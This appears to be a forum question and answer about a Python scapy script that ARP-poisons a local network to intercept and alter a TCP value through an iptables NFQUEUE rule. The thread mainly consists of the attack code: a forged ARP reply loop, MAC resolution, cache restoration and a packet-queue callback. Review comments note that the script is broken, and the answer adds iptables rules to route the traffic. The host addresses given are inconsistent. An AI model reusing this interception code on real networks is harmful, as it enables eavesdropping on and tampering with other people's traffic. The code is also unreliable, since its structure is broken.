
I am trying to MITM my local network (ARP poisoning) so that I can intercept a value sent over TCP, change it and forward it (using scapy and Netfilter with iptables). I don't know whether it is possible to change the packet on the fly, or whether I have to make a copy of it, drop the original and send a new packet with the specific value changed. For now I wrote this code, but I don't see any packet.

/proc/net/netfilter/nfnetlink_queue 
0  48352     0 2 65531     0     0        0  1

iptables rule :

iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE

192.168.3.2 is the victim and 192.168.0.1 is the gateway, and forwarding is enabled:

   /proc/sys/net/ipv4/ip_forward
1

Here is my code:

    from scapy.all import *
from scapy.error import Scapy_Exception
import os
import sys
import threading
import signal
from netfilterqueue import NetfilterQueue
import nfqueue

# Interface scapy binds to, the two hosts being relayed, and the count
# that only appears in a status message further down.
INTERFACE = 'eth0'
TARGET_IP = '192.168.0.1'
GATEWAY_IP = '192.168.0.2'
PACKET_COUNT = 100

def test (packet):
    print packet.show()
    packet.accept()

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-advertise the genuine gateway/target MAC bindings, then stop.

    Broadcasts five ARP replies in each direction carrying the real MAC
    addresses so both hosts' ARP caches converge back to correct entries,
    then sends SIGINT to this process via os.kill.

    Args:
        gateway_ip, gateway_mac: the gateway's real IP and MAC.
        target_ip, target_mac: the target host's real IP and MAC.
    """
    print('[*] Restoring targets...')
    # (psrc, pdst, hwsrc) for the two corrective replies, sent in this order.
    corrections = (
        (gateway_ip, target_ip, gateway_mac),
        (target_ip, gateway_ip, target_mac),
    )
    for src_ip, dst_ip, src_mac in corrections:
        reply = ARP(op=2, psrc=src_ip, pdst=dst_ip,
                    hwdst='ff:ff:ff:ff:ff:ff', hwsrc=src_mac)
        send(reply, count=5)
    # Interrupt ourselves so the rest of the script winds down the same way
    # a Ctrl-C would.
    os.kill(os.getpid(), signal.SIGINT)

def get_mac(ip_address):
    """Resolve *ip_address* to a MAC address with a broadcast ARP request.

    Sends an Ethernet-broadcast ARP who-has via scapy's layer-2 ``srp``
    (2 s timeout, up to 10 retries) and returns the Ethernet source MAC of
    the first reply, or ``None`` when nobody answered.
    """
    who_has = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip_address)
    answered, _unanswered = srp(who_has, timeout=2, retry=10)
    first = next(iter(answered), None)
    if first is None:
        return None
    _sent, reply = first
    return reply[Ether].src

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Send forged ARP replies to the gateway and the target.

    Each host is told that the other's IP address belongs to the sender of
    the reply (``hwsrc`` is not set, so scapy's default applies - presumably
    the local interface MAC; confirm). This is the ARP cache poisoning
    pattern that dynamic ARP inspection and static ARP entries exist to
    defeat.

    NOTE(review): everything from the ``if __name__ == '__main__':`` line
    onward is indented inside this function and sits after an unconditional
    ``return``, so none of it ever runs. The module therefore has no real
    entry point, which is consistent with the script printing nothing.
    """
    # NOTE(review): this local shadows the function's own name for the rest
    # of the body, so the Thread(target=poison_target, ...) further down
    # would refer to this ARP packet, not to the function.
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print '[*] Beginning the ARP poison. [CTRL-C to stop]'
    while 1:
        try:
            send(poison_target)
            send(poison_gateway)
            # `time` is not imported explicitly here; it presumably arrives
            # via `from scapy.all import *` - confirm.
            time.sleep(2)

        except KeyboardInterrupt:
            # NOTE(review): this function is started on a worker thread below;
            # Python delivers SIGINT to the main thread, so this handler is
            # unlikely to ever fire here.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

        # NOTE(review): these two lines are inside the `while` body, so the
        # loop executes exactly once and the function returns.
        print '[*] ARP poison attack finished.'
        return

    # ---- Unreachable from here on: indented into this function, after the
    # return above. Documented as written.
    if __name__ == '__main__':
        conf.iface = INTERFACE
        conf.verb = 0
        print "[*] Setting up %s" % INTERFACE
        GATEWAY_MAC = get_mac(GATEWAY_IP)
        if GATEWAY_MAC is None:
            print "[-] Failed to get gateway MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)

        TARGET_MAC = get_mac(TARGET_IP)
        if TARGET_MAC is None:
            print "[-] Failed to get target MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)

    # `poison_target` here is the local ARP object (see the note at the top
    # of the body), not the function.
    poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
        TARGET_IP, TARGET_MAC))
    poison_thread.start()

    # Create Queue: bind to AF_INET, register `test` as the callback and
    # attach to NFQUEUE number 0. `socket` is not imported explicitly;
    # presumably it also comes from `from scapy.all import *` - confirm.
    q = nfqueue.queue()
    q.open()
    q.bind(socket.AF_INET)
    q.set_callback(test)
    q.create_queue(0)

    try:
        print '[*] Starting sniffer for %d packets' %PACKET_COUNT
        # NOTE(review): bpf_filter is assigned but never used; nfqueue
        # selection is done by the iptables rule, not by a BPF string.
        bpf_filter = 'IP host ' + TARGET_IP
        q.try_run()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)

    except Scapy_Exception as msg:
        print msg, "Hi there!!"

    except KeyboardInterrupt:
        q.unbind(socket.AF_INET)
        q.close()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
        # NOTE(review): typo - `sys` has no attribute `exist`; this line
        # would raise AttributeError instead of exiting.
        sys.exist()

I'm sure the ARP poisoning itself works well, but I don't know why it prints nothing.
I referred to these links: ARP-poisoning and Change TCP Payload and

altering-packets-on-the-fly-with-scapy




You should specify which queue you are using for the input and for the established connection. For example, queue 0, with 192.168.0.2 as your gateway (assuming you are the gateway and the one that does the masquerade):

iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE --queue-num 0
iptables -I OUTPUT -d 192.168.0.2 -p tcp --sport 6767 -m conntrack --ctstate RELATED,ESTABLISHED -j NFQUEUE --queue-num 0

And please fix your code: it looks like some code from the "main" block has slipped into "poison_target".
